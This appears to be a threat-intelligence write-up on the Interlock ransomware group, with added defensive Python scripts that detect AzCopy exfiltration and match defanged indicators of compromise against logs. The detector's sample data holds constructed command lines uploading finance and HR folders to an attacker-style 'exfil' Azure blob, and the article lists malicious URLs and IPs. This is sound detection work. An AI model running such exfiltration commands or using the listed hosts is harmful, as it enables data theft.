
A new ransomware group dubbed Interlock has entered the threat landscape, with targeted attacks across sectors including US healthcare, IT and government, and European manufacturing; its attack chain spans approximately 2-3 weeks.
Interlock employs both hunting and double extortion tactics: compromised data is stolen and the group threatens to release it publicly unless a ransom is paid. It operates a data leak site known as Worldwide Secrets Blog to publish stolen data.
Initial access often comes through a fake Google Chrome browser updater that installs a remote access tool (RAT) disguised as a legitimate update. On execution, this RAT collects detailed system information, establishes a secure connection to a C2 server, and transmits encrypted data.
The RAT then installs a credential-stealing component that lets Interlock capture login details for online accounts. Interlock's arsenal extends beyond simple data collection: the group evades detection by disabling EDR and clearing event logs.
Lateral movement is achieved using RDP and other remote access tools. The encryption stage uses both Windows and Linux variants of the Interlock ransomware, and both rely on the LibTomCrypt cryptographic library.
The encryptor skips critical system folders and specific file extensions to avoid destabilizing the system. The Windows variant uses Cipher Block Chaining (CBC) encryption, while the Linux variant may use CBC or RSA encryption.
Security researchers noted a potential connection between the Interlock and Rhysida ransomware groups, citing overlapping attack techniques, tools, and even code.
The Interlock ransomware encryptor with the filename "conhost.exe" was earlier seen in Rhysida ransomware attacks, along with overlaps in TTPs and tools including PowerShell scripts and AnyDesk.
Both Rhysida and Interlock operators use AzCopy to exfiltrate the victim’s data to an attacker-controlled Azure storage blob, an old but uncommon technique.
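AzCopy uploads to an attacker-controlled blob leave a recognisable shape in process-creation telemetry: the `copy`/`sync` verb, a local or UNC source, and a destination under `*.blob.core.windows.net`. The following detection is an added example written for this page, not code from Cisco Talos or the Interlock toolset; the event records, host names and storage account name are constructed, and the field names (`image`, `cmdline`) are assumed to be what an EDR or Sysmon export would provide. It keys on the argument structure rather than the binary name, so a renamed AzCopy binary is still flagged, and it strips the SAS token from the destination before it is written to an alert.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (hypothetical EDR/Sysmon-style export,
# not taken from the Talos report). Field names are an assumption of this example.
SAMPLE_EVENTS = [
    {"host": "WS-017", "user": "jdoe",
     "image": r"C:\Users\jdoe\Downloads\azcopy.exe",
     "cmdline": r'azcopy.exe copy "C:\Finance" "https://examplestorage.blob.core.windows.net/exfil?sv=2022-11-02&sig=REDACTED" --recursive'},
    {"host": "SRV-DB01", "user": "svc_backup",   # legitimate download, not an upload
     "image": r"C:\Program Files\azcopy\azcopy.exe",
     "cmdline": r'azcopy.exe copy "https://corpbackup.blob.core.windows.net/db/full.bak" "D:\restore\full.bak"'},
    {"host": "WS-042", "user": "asmith",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\asmith\notes.txt"},
    {"host": "WS-017", "user": "jdoe",          # renamed AzCopy binary, UNC share source
     "image": r"C:\Windows\Temp\ac.exe",
     "cmdline": r'ac.exe copy "\\FS01\Shares\HR" "https://examplestorage.blob.core.windows.net/exfil?sig=REDACTED" --recursive --overwrite=true'},
]

# AzCopy v10 syntax: azcopy copy|sync <source> <destination> [flags]; cp is an alias of copy.
AZCOPY_VERBS = {"copy", "cp", "sync"}
BLOB_HOST = re.compile(r"^https://[^/]+\.blob\.core\.windows\.net(/|$)", re.IGNORECASE)
TOKEN = re.compile(r'"([^"]*)"|(\S+)')   # quoted argument or bare word

@dataclass
class Alert:
    host: str
    user: str
    source: str
    destination: str
    renamed_binary: bool

def tokenize(cmdline):
    """Split a Windows command line into arguments, dropping surrounding quotes."""
    return [quoted if quoted else bare for quoted, bare in TOKEN.findall(cmdline)]

def is_local_path(arg):
    """True for drive-letter paths (C:\\...) and UNC shares (\\\\server\\share)."""
    return arg.startswith("\\\\") or re.match(r"^[A-Za-z]:\\", arg) is not None

def detect_azcopy_upload(event):
    """Return an Alert when the command line copies local/UNC data up to an Azure blob."""
    argv = tokenize(event["cmdline"])
    if len(argv) < 4 or argv[1].lower() not in AZCOPY_VERBS:
        return None
    positional = [a for a in argv[2:] if not a.startswith("--")]
    if len(positional) < 2:
        return None
    src, dst = positional[0], positional[1]
    if not (is_local_path(src) and BLOB_HOST.match(dst)):
        return None           # downloads and non-blob destinations are not flagged
    image_name = event["image"].rsplit("\\", 1)[-1].lower()
    return Alert(host=event["host"], user=event["user"], source=src,
                 destination=dst.split("?", 1)[0],   # drop the SAS token before logging
                 renamed_binary=image_name != "azcopy.exe")

def scan(events):
    return [a for a in (detect_azcopy_upload(e) for e in events) if a is not None]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Run as-is it reports two of the four constructed events: the plain `azcopy.exe` upload from `C:\Finance` and the renamed `ac.exe` upload from the HR share; the backup restore (blob to local) and the notepad launch are left alone. In production the blob host check would be narrowed further to exclude the organisation's own storage accounts, since a legitimate storage account name is the one signal this heuristic cannot infer from the command line.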
Interlock and Rhysida deliver ransom notes with a similar theme.
This research was documented by researchers from Cisco Talos.
Indicators of Compromise
- 23[.]95[.]182[.]59
- 195[.]201[.]21[.]34
- 159[.]223[.]46[.]184
- hxxp[:]//23[.]95[.]182[.]59/31279geuwtoisgdehbiuowaehsgdb/cht
- hxxp[:]//23[.]95[.]182[.]59/31279geuwtoisgdehbiuowaehsgdb/klg
- hxxps[:]//apple-online[.]shop/ChromeSetup[.]exe
- hxxps[:]//rvthereyet[.]com/wp-admin/images/rsggj[.]php
- a26f0a2da63a838161a7d335aaa5e4b314a232acc15dcabdb6f6dbec63cda642
- c9920e995fbc98cd3883ef4c4520300d5e82bab5d2a5c781e9e9fe694a43e82f
- e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1
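The indicators above are published defanged (`[.]`, `hxxp`, `[:]`), so they have to be refanged and normalised before they can be matched against telemetry. The script below is an added example for this page, not code from Cisco Talos; it takes the listed indicators verbatim, builds a lookup index split by type (SHA-256, IPv4, URL, and the domains extracted from the URLs), and scans a handful of constructed proxy, EDR and firewall log lines. Hash comparison is case-insensitive and URL comparison lowercases only the scheme and host, since the path is case-significant on the serving host.

```python
import re

# Indicators copied verbatim from the list above, still in defanged form.
DEFANGED_IOCS = [
    "23[.]95[.]182[.]59",
    "195[.]201[.]21[.]34",
    "159[.]223[.]46[.]184",
    "hxxp[:]//23[.]95[.]182[.]59/31279geuwtoisgdehbiuowaehsgdb/cht",
    "hxxp[:]//23[.]95[.]182[.]59/31279geuwtoisgdehbiuowaehsgdb/klg",
    "hxxps[:]//apple-online[.]shop/ChromeSetup[.]exe",
    "hxxps[:]//rvthereyet[.]com/wp-admin/images/rsggj[.]php",
    "a26f0a2da63a838161a7d335aaa5e4b314a232acc15dcabdb6f6dbec63cda642",
    "c9920e995fbc98cd3883ef4c4520300d5e82bab5d2a5c781e9e9fe694a43e82f",
    "e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1",
]

# Constructed sample log lines (not real telemetry): proxy, EDR and firewall formats.
SAMPLE_LOGS = [
    "2024-11-05T09:12:31Z proxy WS-017 10.0.4.21 GET https://apple-online.shop/ChromeSetup.exe 200 1839204",
    "2024-11-05T09:14:02Z proxy WS-017 10.0.4.21 GET http://23.95.182.59/31279geuwtoisgdehbiuowaehsgdb/cht 200 512",
    "2024-11-05T09:14:05Z proxy WS-042 10.0.4.77 GET https://www.example.org/index.html 200 1024",
    r"2024-11-05T09:20:44Z edr WS-017 process_create image=C:\Users\jdoe\AppData\Local\Temp\ChromeSetup.exe sha256=A26F0A2DA63A838161A7D335AAA5E4B314A232ACC15DCABDB6F6DBEC63CDA642",
    "2024-11-05T09:21:10Z fw WS-017 10.0.4.21 -> 195.201.21.34:443 allow",
    "2024-11-05T09:25:00Z fw WS-042 10.0.4.77 -> 203.0.113.10:443 allow",
]

IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
SHA256 = re.compile(r"\b[0-9a-fA-F]{64}\b")
URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def refang(ioc):
    """Undo the usual defanging conventions: [.] -> ., [:] -> :, hxxp -> http."""
    s = ioc.replace("[.]", ".").replace("[:]", ":")
    return re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE)

def classify(value):
    if SHA256.fullmatch(value):
        return "sha256"
    if IPV4.fullmatch(value):
        return "ipv4"
    if re.match(r"^https?://", value, re.IGNORECASE):
        return "url"
    return "unknown"

def normalize_url(url):
    """Lowercase scheme and host only; the path stays case-sensitive."""
    m = re.match(r"^(https?://[^/]+)(.*)$", url, re.IGNORECASE)
    return m.group(1).lower() + m.group(2)

def url_host(url):
    return re.match(r"^https?://([^/:]+)", url, re.IGNORECASE).group(1).lower()

def build_index(defanged):
    index = {"sha256": set(), "ipv4": set(), "url": set(), "domain": set()}
    for d in defanged:
        value = refang(d)
        kind = classify(value)
        if kind == "sha256":
            index["sha256"].add(value.lower())
        elif kind == "ipv4":
            index["ipv4"].add(value)
        elif kind == "url":
            index["url"].add(normalize_url(value))
            host = url_host(value)
            # an IP-based URL also contributes its address; a named host contributes a domain
            index["ipv4" if classify(host) == "ipv4" else "domain"].add(host)
    return index

def scan_line(line, index):
    """Return (type, value) hits for one log line; a line may hit on several indicator types."""
    hits = []
    for h in SHA256.findall(line):
        if h.lower() in index["sha256"]:
            hits.append(("sha256", h.lower()))
    for u in URL.findall(line):
        nu = normalize_url(u)
        if nu in index["url"]:
            hits.append(("url", nu))
        elif url_host(u) in index["domain"]:
            hits.append(("domain", url_host(u)))
    for ip in IPV4.findall(line):
        if ip in index["ipv4"]:
            hits.append(("ipv4", ip))
    return hits

def scan_logs(lines, index):
    """Map line number -> hits for every line that matched at least one indicator."""
    results = {}
    for i, line in enumerate(lines):
        hits = scan_line(line, index)
        if hits:
            results[i] = hits
    return results

if __name__ == "__main__":
    idx = build_index(DEFANGED_IOCS)
    for lineno, hits in scan_logs(SAMPLE_LOGS, idx).items():
        print(lineno, hits)
```

Against the constructed lines this flags the ChromeSetup.exe download, the request to the `/cht` path (as both a URL and an IP hit), the EDR process event whose uppercase hash matches the first SHA-256, and the firewall allow to 195.201.21.34, while the example.org request and the TEST-NET address produce nothing. The domain set is what makes the same index useful against DNS logs, where no full URL is available.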